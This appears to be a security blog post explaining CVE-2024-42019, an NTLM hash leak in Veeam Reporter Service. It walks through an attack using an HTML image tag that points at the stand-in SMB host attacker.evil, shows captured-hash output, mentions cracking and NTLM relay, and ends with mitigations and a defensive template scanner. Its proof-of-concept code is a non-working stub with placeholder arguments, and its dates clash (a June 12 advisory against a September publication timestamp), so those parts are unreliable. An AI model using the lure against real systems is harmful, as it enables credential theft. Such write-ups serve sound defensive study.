On June 12, 2024, Veeam released an advisory for a serious vulnerability—CVE-2024-42019—that affects their Reporter Service, a component often installed with Veeam Backup & Replication. This vulnerability lets an attacker extract the NTLM hash of the account used by the Reporter Service. With enough attacker finesse, this hash can eventually be cracked, letting someone else assume the identity and permissions of the service. In this post, I’ll break down how the issue works, why it’s risky, and walk through a proof-of-concept demonstrating real-world exploitability.
> TL;DR: If you run Veeam Reporter Service, update now. The NTLM hash can be stolen and reused to impersonate your service account if attackers get a little help from an unsuspecting user.
What is the Veeam Reporter Service?
Veeam’s Reporter Service is used to gather and present reporting data from their Backup & Replication platform. By default, it runs under a dedicated service account with elevated permissions needed for reporting features. Having this service account compromised can lead to lateral movement or further privilege escalation in your environment.
Details of CVE-2024-42019
CVE-2024-42019 is a vulnerability that allows a network attacker to retrieve the NTLM hash of the Veeam Reporter Service’s account credentials. The catch is that the attacker needs a user on the targeted network to interact, usually by opening a malicious file or link, or by loading a crafted report.
How Does It Work?
The underlying issue is in how the Veeam Reporter Service processes external resources in some report templates. It may fetch remote content (for instance, an image or script) using the privileges of the service account, even if the target is an attacker-controlled SMB share. When this happens, standard Windows authentication can be triggered, automatically sending the service account’s NTLM hash as part of the handshake.
Here’s the simplified attack chain:
1. Attacker prepares a malicious report file (example: with an embedded remote SMB image or iframe).
2. User loads the file in Veeam Reporter (via the Veeam Backup & Replication console or web interface).
3. Reporter Service fetches the remote resource with its own Windows credentials (the service account).
4. Attacker-controlled SMB server receives the connection attempt, capturing the account’s NTLM hash.
Exploit Walkthrough
Let’s show how this looks, step by step. Assume the attacker’s machine is accessible as attacker.evil and an SMB listener that captures hashes (Responder or Impacket’s smbserver.py, as used below) is running on it.
1. Crafting a Malicious Report
The attacker creates a fake report file or template that includes an external image from an SMB share they control. Here’s a simple snippet for such a report (HTML-based):
<img src="\\attacker.evil\share\logo.png" alt="Logo"/>
2. Luring a User to Open the Report
By social engineering (a phishing email, file drop in a shared folder, etc.), an attacker convinces a Veeam admin or user to view the malicious report in the Veeam Reporter interface.
3. Hash Theft
When the report is loaded, Veeam Reporter tries to fetch logo.png from the attacker’s SMB share, authenticating with its own service account. The attacker captures the handshake and the NTLM hash, using a tool like Responder or Impacket’s smbserver.py.
Example Responder output:
[SMB] NTLMv2-SSP Client : 10...50
[SMB] NTLMv2-SSP Username : COMPANY\VEEAMSRV
[SMB] NTLMv2-SSP Hash : VEEAMSRV::COMPANY:hashhashhash...
The attacker can:
* Attempt to crack the hash using Hashcat and a dictionary attack.
* Use NTLM relay attacks (with Impacket’s ntlmrelayx.py) to authenticate as the service account somewhere else on the network, possibly gaining more access.
Simple Python Proof of Concept
Below is a proof-of-concept SMB server using Impacket that will print any hashes it receives (save as smbcatcher.py):
from impacket.smbserver import SMBServer
server = SMBServer(('...', 445), ('...', 445))
server.start()
> (real implementations should use impacket’s smbserver.py directly; this is for illustration.)
References
- Official Advisory: https://www.veeam.com/kb4568
- Impacket (NTLM relay & SMB tools)
- Responder (Hash capture)
- Hashcat (NTLM hash cracking)
Mitigation
- Update Veeam Backup & Replication and Reporter Service as soon as possible (patch details).
- Restrict outbound SMB/CIFS connections from servers holding sensitive services.
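A further check worth automating on the defender side: flag report templates that reference UNC paths or hosts outside an allowlist before they are ever loaded, since that is exactly what the `<img src="\\attacker.evil\share\logo.png">` snippet in the walkthrough relies on. This is an added example, not Veeam’s code; it assumes HTML-based templates like the snippet above, and the sample template and allowlist are constructed.

```python
"""Flag HTML report templates that reference UNC paths or unknown hosts.

Added defensive example (not Veeam code). Assumes HTML-based templates;
the sample template and the allowlist below are constructed.
"""
from html.parser import HTMLParser
import re

# Attributes that make a renderer fetch a resource with its own credentials.
FETCH_ATTRS = {"src", "href", "data", "poster", "background"}
# \\host\share, //host/share, file: or smb: references trigger SMB auth.
UNC_RE = re.compile(r"^(\\\\|//|file:|smb:)", re.IGNORECASE)
# http(s) references are fine only for allowlisted hosts.
URL_RE = re.compile(r"^https?://([^/:]+)", re.IGNORECASE)


class ExternalRefScanner(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []  # (tag, attr, value, reason)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() not in FETCH_ATTRS or not value:
                continue
            v = value.strip()
            if UNC_RE.match(v):
                self.findings.append((tag, name, v, "unc-or-file-path"))
            else:
                m = URL_RE.match(v)
                if m and m.group(1).lower() not in self.allowed:
                    self.findings.append((tag, name, v, "external-host"))


def scan_report(html, allowed_hosts=()):
    """Return a list of (tag, attr, value, reason) for risky references."""
    scanner = ExternalRefScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample template mirroring the snippet from the walkthrough.
SAMPLE = """<html><body>
<img src="\\\\attacker.evil\\share\\logo.png" alt="Logo"/>
<img src="https://reports.corp.example/logo.png"/>
<img src="https://cdn.example.net/track.gif"/>
<link rel="stylesheet" href="//attacker.evil/s.css">
<img src="cid:inline-logo">
</body></html>"""

if __name__ == "__main__":
    for hit in scan_report(SAMPLE, allowed_hosts=["reports.corp.example"]):
        print("RISKY %s[%s]=%s (%s)" % hit)
```

The `cid:` reference and the allowlisted host are left alone; the UNC path, the protocol-relative `//` reference and the non-allowlisted host are reported.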
Conclusion
CVE-2024-42019 is a clear example of how even trusted administrative tools can be used as an attack vector by chaining social engineering with classic Windows authentication quirks. By patching quickly and preventing SMB egress, network defenders can keep their environments much safer.
Always be suspicious of external content in reporting tools—and keep your service accounts locked down and closely monitored!
Timeline
Published on: 09/07/2024 17:15:13 UTC
Last modified on: 09/09/2024 17:35:05 UTC